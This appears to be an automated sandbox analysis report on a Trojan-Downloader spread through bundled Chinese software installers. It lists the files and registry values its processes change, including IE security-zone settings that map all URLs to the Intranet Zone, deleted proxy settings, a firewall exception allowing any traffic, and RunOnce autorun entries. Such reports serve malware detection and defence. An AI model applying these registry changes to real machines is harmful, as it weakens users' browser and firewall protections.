%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\manifest.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\qqtrack.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\driver\i386\tsqbdrv.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\xaml\ClearDialog.xaml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\navi.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\webp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\snapshot_blob.bin (0 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}_1\QBSafe.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\qb_100_percent.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\compat.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\chrome.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\MacroConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\extensions (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\chrome_100_percent.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\qbroker (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\PepperFlash\pepflashplayer.dll (0 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\BugReport.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\driver\ScreenDef (0 bytes)
The process WiFi-2175.exe:664 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
The Trojan-Downloader deletes the following file(s):
%Documents and Settings%\%current user%\Application Data\WiFiMaster\LocalConfigure.db-journal (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss8.tmp (0 bytes)
The process BrowserProtect18.exe:2432 makes changes in the file system.
The Trojan-Downloader deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\qbwup.imtt.qq[1] (0 bytes)
The process QQBrowserOTA.exe:2012 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nss17.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\SSO\SSOCommon.dll (41699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss17.tmp\InstallHelper.dll (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn16.tmp (78435 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\SSO\SSOPlatform.dll (48241 bytes)
The Trojan-Downloader deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss17.tmp\InstallHelper.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss17.tmp\System.dll (0 bytes)
The process ExternalApp.exe:1112 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
The Trojan-Downloader deletes the following file(s):
%Program Files%\SogouSoftware\ÈüþÖúÊÖ.lnk (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp\System.dll (0 bytes)
The process QBDownload.exe:2504 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\version (556 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\j3lx7ew39.exe (2868107 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qbdrf\dr.dll (83 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\Report.Ini (511 bytes)
The Trojan-Downloader deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\qbdrf (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\version (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qbdrf\dr.dll (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\j3lx7ew39.exe (0 bytes)
The process regsvr32.exe:808 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%System%\GroupPolicy\gpt.ini (315 bytes)
%System%\GroupPolicy\Machine\Registry.pol (268 bytes)
The process TsService.exe:3568 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\MetaData\A89DFCC31C360BA5CBD616749B1B1C5D (140 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\Content\A89DFCC31C360BA5CBD616749B1B1C5D (152 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
The process SuiteDownloader20160222153349.exe:1488 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\QBDownload.exe (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\QQPCDownload8889533.exe (7972 bytes)
Registry activity
The process QQPCMgr_Setup.exe:2796 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A0 8A CF 9E 81 3F 54 80 DA 8A 98 E8 08 D5 C2 41"
[HKLM\SOFTWARE\Tencent\QQPCMgr]
"SupplyID" = "8889533"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCR\qmgcfiles\Shell\open\Command]
"(Default)" = "%Program Files%\Tencent\QQPCMgr\11.5.17499.219\\QMDeskTopGC.exe /file=%1"
The process SogouSoftware.exe:216 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1460984650"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016051920160520]
"CacheRepair" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\SogouSoftware\Download\BindSoft\QQBrowser]
"UITotalShowTime" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKU\S-1-5-19\Software\SogouSoftware\Download\BindSoft\QQBrowser]
"UITotalShowTime" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016051920160520]
"CacheLimit" = "8192"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"SuiteDownloader20160222153349.exe" = "SuiteDownloader20160222153349"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKU\S-1-5-20_CLASSES\SOFTWARE\SogouSoftware\Download\BindSoft\QQBrowser]
"UITotalShowTime" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Classes\Software\SogouSoftware\Download\BindSoft\QQBrowser]
"UITotalShowTime" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\SogouSoftware]
"FirstRun" = "1"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "SogouSoftware.exe"
[HKU\S-1-5-20\Software\SogouSoftware\Download\BindSoft\QQBrowser]
"UITotalShowTime" = "1"
[HKU\S-1-5-19\Software\SogouSoftware\Download\BindSoft\QQBrowser]
"ShowUITime" = "Type: REG_QWORD, Length: 8"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\SogouSoftware\Download\BindSoft\QQBrowser]
"ShowUITime" = "Type: REG_QWORD, Length: 8"
[HKU\.DEFAULT\Software\SogouSoftware\Download\BindSoft\QQBrowser]
"UITotalShowTime" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016051920160520]
"CacheOptions" = "11"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\SogouSoftware\tmp]
"ExternalApp.exe" = "软件助手安装包"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016051920160520]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012016051920160520\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKU\S-1-5-20\Software\SogouSoftware\Download\BindSoft\QQBrowser]
"ShowUITime" = "Type: REG_QWORD, Length: 8"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 C1 DC 11 16 E5 C8 C0 34 54 72 48 3F 61 CC 7C"
[HKU\S-1-5-19_CLASSES\SOFTWARE\SogouSoftware\Download\BindSoft\QQBrowser]
"ShowUITime" = "Type: REG_QWORD, Length: 8"
[HKCU\Software\Classes\Software\SogouSoftware\Download\BindSoft\QQBrowser]
"ShowUITime" = "Type: REG_QWORD, Length: 8"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016051920160520]
"CachePrefix" = ":2016051920160520:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKU\.DEFAULT\Software\SogouSoftware\Download\BindSoft\QQBrowser]
"ShowUITime" = "Type: REG_QWORD, Length: 8"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\SogouDownload]
"WiFi-2175.exe" = "WiFi共享大师"
[HKU\S-1-5-19_CLASSES\SOFTWARE\SogouSoftware\Download\BindSoft\QQBrowser]
"UITotalShowTime" = "1"
[HKU\S-1-5-20_CLASSES\SOFTWARE\SogouSoftware\Download\BindSoft\QQBrowser]
"ShowUITime" = "Type: REG_QWORD, Length: 8"
The Trojan-Downloader modifies IE security zone settings to map all local web-nodes with no dots, which do not refer to any zone, to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-Downloader modifies IE security zone settings to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-Downloader modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-Downloader deletes the following registry key(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031720140318]
The Trojan-Downloader deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process QQBrowserLiveup.exe:1808 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA D1 CB 57 C9 56 3B 06 90 98 96 14 8C FD E3 48"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan-Downloader modifies IE security zone settings to map all local web-nodes with no dots, which do not refer to any zone, to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-Downloader modifies IE security zone settings to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-Downloader modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-Downloader deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process InstAsm.exe:3332 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan-Downloader adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"WinSideBySideSetupCleanup 842843" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\842843"
"WinSideBySideSetupCleanup 800656" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\800656"
"WinSideBySideSetupCleanup 806309" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\806309"
"WinSideBySideSetupCleanup 816749" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\816749"
"WinSideBySideSetupCleanup 761294" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\761294"
"WinSideBySideSetupCleanup 825721" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\825721"
"WinSideBySideSetupCleanup 732509" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\732509"
"WinSideBySideSetupCleanup 776418" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\776418"
The Trojan-Downloader deletes the following value(s) in system registry:
The Trojan-Downloader disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"WinSideBySideSetupCleanup 825721"
"WinSideBySideSetupCleanup 732509"
"WinSideBySideSetupCleanup 761294"
"WinSideBySideSetupCleanup 776418"
"WinSideBySideSetupCleanup 806309"
"WinSideBySideSetupCleanup 842843"
"WinSideBySideSetupCleanup 800656"
"WinSideBySideSetupCleanup 816749"
The process MiniThunderPlatform.exe:2060 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 78 02 98 D2 01 24 D7 56 E5 8A 49 2D E0 52 BE"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-Downloader modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-Downloader deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process minidownload.exe:1832 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B 38 B2 65 2F 04 64 19 1F 81 2F B8 FB 23 49 11"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process MiniTPFw.exe:500 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C FD A0 52 F9 59 D1 C5 77 0C F8 E0 43 8B 5E 74"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\SogouSoftware\download\download]
"ThunderFW.exe" = "ThunderFW"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan-Downloader modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The process ThunderFW.exe:568 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 90 D9 B6 D4 A7 05 4E 04 F1 E2 DB CB 8C CE 8F"
Adds a rule to the Windows firewall that allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\SogouSoftware\download\download]
"MiniThunderPlatform.exe" = "%Program Files%\SogouSoftware\download\download\MiniThunderPlatform.exe:*:Enabled:MiniThunderPlatform2016-05-1910:13:05"
The process %original file name%.exe:856 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\SogouSoftware]
"unc" = "sogousoftware_normal"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
